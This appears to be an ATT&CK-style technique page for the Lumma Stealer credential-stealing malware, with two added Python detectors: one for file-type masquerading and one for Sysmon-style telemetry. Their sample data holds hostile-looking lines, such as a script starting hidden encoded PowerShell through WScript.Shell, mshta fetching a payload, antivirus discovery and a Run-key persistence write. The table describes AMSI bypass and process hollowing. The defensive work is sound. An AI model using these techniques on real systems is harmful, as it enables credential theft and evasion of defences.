Lumma Stealer
Associated Software Descriptions

| Name | Description |
|---|---|
| LummaStealer | (Citation: Cybereason LumaStealer Undated) |
Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Lumma Stealer has used HTTP and HTTPS for command and control communication.(Citation: Qualys LummaStealer 2024)(Citation: Fortinet LummaStealer 2024) |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Lumma Stealer has created registry values under `HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` to maintain persistence.(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025) |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Lumma Stealer has used PowerShell for initial user execution and other functions.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated)(Citation: Netskope LummaStealer 2025)(Citation: Fortinet LummaStealer 2024) |
| Enterprise | T1059.006 | Command and Scripting Interpreter: Python | Lumma Stealer has used malicious Python scripts to execute payloads.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1059.010 | Command and Scripting Interpreter: AutoHotKey & AutoIT | Lumma Stealer has used malicious AutoIt scripts and compiled AutoIt executables.(Citation: Qualys LummaStealer 2024)(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Lumma Stealer has gathered credentials and other information from multiple browsers.(Citation: Cybereason LumaStealer Undated)(Citation: Fortinet LummaStealer 2024)(Citation: TrendMicro LummaStealer 2025) |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | Lumma Stealer has configured a custom user data directory, such as a folder within `%USERPROFILE%\AppData\Roaming`, for staging collected data.(Citation: TrendMicro LummaStealer 2025) |
| Enterprise | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Lumma Stealer has used HTTPS for command and control.(Citation: Fortinet LummaStealer 2024) |
| Enterprise | T1564.003 | Hide Artifacts: Hidden Window | Lumma Stealer has used the .NET `ProcessStartInfo` class with `CreateNoWindow` set to `True`, so the executed command or script runs without displaying a command prompt window.(Citation: Fortinet LummaStealer 2024) |
| Enterprise | T1574.001 | Hijack Execution Flow: DLL | Lumma Stealer has abused legitimate applications to side-load malicious DLLs during execution.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1562.001 | Impair Defenses: Disable or Modify Tools | Lumma Stealer has attempted to bypass the Windows Antimalware Scan Interface (AMSI) by removing the string "AmsiScanBuffer" from the in-memory `clr.dll` module so that the function is never called.(Citation: Netskope LummaStealer 2025) |
| Enterprise | T1036.008 | Masquerading: Masquerade File Type | Lumma Stealer has used payloads carrying benign-looking file extensions such as .mp3, .accdb, and .pub whose content was actually malicious JavaScript.(Citation: Netskope LummaStealer 2025) |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Lumma Stealer has used AES-encrypted payloads embedded in PowerShell scripts.(Citation: Qualys LummaStealer 2024) |
| Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Lumma Stealer has been delivered through phishing emails with malicious attachments.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1566.002 | Phishing: Spearphishing Link | Lumma Stealer has been delivered through phishing emails containing malicious links.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1055.012 | Process Injection: Process Hollowing | Lumma Stealer has used process hollowing against a legitimate program such as `BitLockerToGo.exe` to inject its payload.(Citation: Qualys LummaStealer 2024) |
| Enterprise | T1518.001 | Software Discovery: Security Software Discovery | Lumma Stealer has detected antivirus processes using commands such as `tasklist` and `findstr`.(Citation: Qualys LummaStealer 2024) |
| Enterprise | T1176.001 | Software Extensions: Browser Extensions | Lumma Stealer has installed a malicious browser extension targeting Google Chrome, Microsoft Edge, Opera, and Brave in order to steal data.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | Lumma Stealer has used valid code signing certificates issued to ConsolHQ LTD and Verandah Green Limited to appear legitimate.(Citation: TrendMicro LummaStealer 2025) |
| Enterprise | T1218.005 | System Binary Proxy Execution: Mshta | Lumma Stealer has used `mshta.exe` to execute additional content.(Citation: Qualys LummaStealer 2024)(Citation: Netskope LummaStealer 2025) |
| Enterprise | T1218.015 | System Binary Proxy Execution: Electron Applications | Lumma Stealer has leveraged Electron applications to disable GPU sandboxing in order to avoid detection by security software.(Citation: TrendMicro LummaStealer 2025) |
| Enterprise | T1204.002 | User Execution: Malicious File | Lumma Stealer has gained initial execution through victims opening malicious executables embedded in ZIP archives, and MSI files inside RAR archives.(Citation: Cybereason LumaStealer Undated) |
| Enterprise | T1497.001 | Virtualization/Sandbox Evasion: System Checks | Lumma Stealer has queried system resources on the victim device to determine whether it is executing in a sandbox or virtualized environment: checking usernames, running WMI queries for system details, looking for files commonly found in virtualized environments, enumerating system services, and inspecting process names.(Citation: Fortinet LummaStealer 2024) Lumma Stealer has also checked the system GPU configuration for sandbox detection.(Citation: TrendMicro LummaStealer 2025) |
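The T1036.008 entry above describes payloads whose extension (.mp3, .accdb, .pub) does not match their actual content (JavaScript). The following script, added here as an illustration and not code from ATT&CK or any of the cited vendors, checks a file's leading bytes against the signature its extension implies and flags script text hiding behind a media or Office extension. The magic values are the standard headers for those formats; the script-token heuristic, the verdict names, and the sample files are constructed assumptions for this example.

```python
import re

# Leading-byte signatures per claimed extension: (offset, expected bytes).
# These are the standard headers for the three formats named on the page.
MAGIC = {
    ".mp3":   [(0, b"ID3")],                               # ID3v2-tagged MP3 (raw frames handled below)
    ".accdb": [(4, b"Standard ACE DB")],                   # Access 2007+ database header at offset 4
    ".pub":   [(0, b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1")],  # OLE2 compound document (Publisher)
}

# Tokens that indicate script text rather than binary content. Heuristic (an assumption),
# tuned to the JavaScript/WSH style payloads mshta.exe would run.
SCRIPT_RE = re.compile(rb"\bfunction\b|\bvar\b|\beval\(|ActiveXObject|WScript\.|<script")


def looks_like_mp3(data: bytes) -> bool:
    """Accept an ID3v2 header or a raw MPEG audio frame sync (11 leading set bits)."""
    if data.startswith(b"ID3"):
        return True
    return len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0


def content_matches(ext: str, data: bytes) -> bool:
    """True when the bytes carry the signature the extension claims."""
    if ext == ".mp3":
        return looks_like_mp3(data)
    return any(data[off:off + len(sig)] == sig for off, sig in MAGIC.get(ext, []))


def classify(filename: str, data: bytes) -> str:
    """Verdicts: 'ok', 'script-masquerade', 'mismatch', or 'unchecked-extension'."""
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    if ext not in MAGIC:
        return "unchecked-extension"
    if content_matches(ext, data):
        return "ok"
    if SCRIPT_RE.search(data):
        return "script-masquerade"   # extension says media/Office, body is script
    return "mismatch"                # wrong type, but not obviously script


def scan(files):
    """files: iterable of (name, bytes). Returns {name: verdict}."""
    return {name: classify(name, data) for name, data in files}


# Constructed sample files for the demo (not real Lumma artifacts).
SAMPLE_FILES = [
    ("track.mp3", b"ID3\x04\x00\x00\x00\x00\x00\x21" + b"\x00" * 16),
    ("verify.mp3", b'var sh = new ActiveXObject("WScript.Shell");\r\nsh.Run("powershell -w hidden -enc AAAA");'),
    ("inventory.accdb", b"\x00\x01\x00\x00Standard ACE DB\x00" + b"\x00" * 16),
    ("invoice.pub", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24),
    ("notice.pub", b"<script>eval(unescape('%75%6e'));</script>"),
    ("export.accdb", b"\x89PNG\r\n\x1a\n"),
    ("readme.txt", b"plain text"),
]

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES).items():
        print(f"{name:16} {verdict}")
```

In practice you would feed this the first few hundred bytes of each file written by a browser, archiver, or script host; a `script-masquerade` verdict on a file that `mshta.exe` is about to open is a strong signal, while `mismatch` alone (for example, a renamed image) needs a second look before alerting.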
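Several rows in the table above (mshta.exe proxy execution, hidden PowerShell, `tasklist`/`findstr` antivirus discovery, Run-key persistence, and hollowing of `BitLockerToGo.exe`) describe behaviours that surface in ordinary endpoint telemetry. The following detection logic, added here as an example and not taken from ATT&CK or from the cited vendor reports, runs those checks over a handful of constructed Sysmon-style events. The event field names, PIDs, paths, command lines, and the parent/child relationships are illustrative assumptions; the technique IDs attached to each finding are the ones from the table.

```python
import re

# Constructed Sysmon-style telemetry: id 1 = process create, id 13 = registry value set.
# Every path, PID and command line below is an illustrative assumption, not real data.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 900, "ppid": 800,
     "image": r"C:\Windows\explorer.exe", "cmdline": r"explorer.exe"},
    {"id": 1, "pid": 4100, "ppid": 900,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://cdn.example.invalid/verify.mp3"},
    {"id": 1, "pid": 4101, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4A"},
    {"id": 1, "pid": 4102, "ppid": 4101,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c tasklist | findstr /i "avp.exe ekrn.exe"'},
    {"id": 13, "pid": 4101,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\user\AppData\Roaming\Updater\upd.exe"},
    {"id": 1, "pid": 4103, "ppid": 4101,
     "image": r"C:\Windows\System32\BitLockerToGo.exe",
     "cmdline": r"BitLockerToGo.exe"},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# mshta.exe handed a URL, or a file whose extension is not .hta (the page lists .mp3/.accdb/.pub)
MSHTA_ARG_RE = re.compile(r"https?://|\.(?:mp3|accdb|pub)\b", re.IGNORECASE)
# hidden window or encoded command on the PowerShell command line
HIDDEN_PS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b|-e\b", re.IGNORECASE)


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return a list of findings, each {'pid', 'technique', 'reason'}."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []

    def hit(pid, technique, reason):
        findings.append({"pid": pid, "technique": technique, "reason": reason})

    for e in events:
        name = image_name(e["image"])
        if e["id"] == 13:
            # A Run-key value written by a script host rather than an installer
            if RUN_KEY_RE.search(e["target"]) and name in SCRIPT_HOSTS:
                hit(e["pid"], "T1547.001", f"{name} wrote Run key {e['target']}")
            continue
        cmd = e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pname = image_name(parent["image"]) if parent else ""
        if name == "mshta.exe" and MSHTA_ARG_RE.search(cmd):
            hit(e["pid"], "T1218.005", "mshta.exe given a URL or a non-.hta file")
        elif name in ("powershell.exe", "pwsh.exe") and HIDDEN_PS_RE.search(cmd):
            hit(e["pid"], "T1564.003", f"hidden/encoded PowerShell spawned by {pname or '?'}")
        elif "tasklist" in cmd.lower() and "findstr" in cmd.lower():
            hit(e["pid"], "T1518.001", "tasklist piped to findstr (security software discovery)")
        elif name == "bitlockertogo.exe" and pname in SCRIPT_HOSTS:
            hit(e["pid"], "T1055.012", f"BitLockerToGo.exe launched by {pname} (hollowing target)")
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f['pid']} {f['technique']}: {f['reason']}")
```

Each rule on its own is noisy in a real estate (administrators do run `tasklist | findstr`, and installers do write Run keys); the value is in the chain, so in production correlate the findings by process ancestry and alert when two or more fire within a single mshta.exe or PowerShell lineage.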
References
- Buddy Tancio, Fe Cureg, and Jovit Samaniego, Trend Micro. (2025, January 30). Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response. Retrieved March 22, 2025.
- Cara Lin, Fortinet. (2024, January 8). Deceptive Cracked Software Spreads Lumma Variant on YouTube. Retrieved March 22, 2025.
- Cybereason Security Services Team. (n.d.). Your Data Is Under New Lummanagement: The Rise of LummaStealer. Retrieved March 22, 2025.
- Leandro Fróes, Netskope. (2025, January 23). Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection. Retrieved March 22, 2025.
- Vishwajeet Kumar, Qualys. (2024, October 20). Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA. Retrieved March 22, 2025.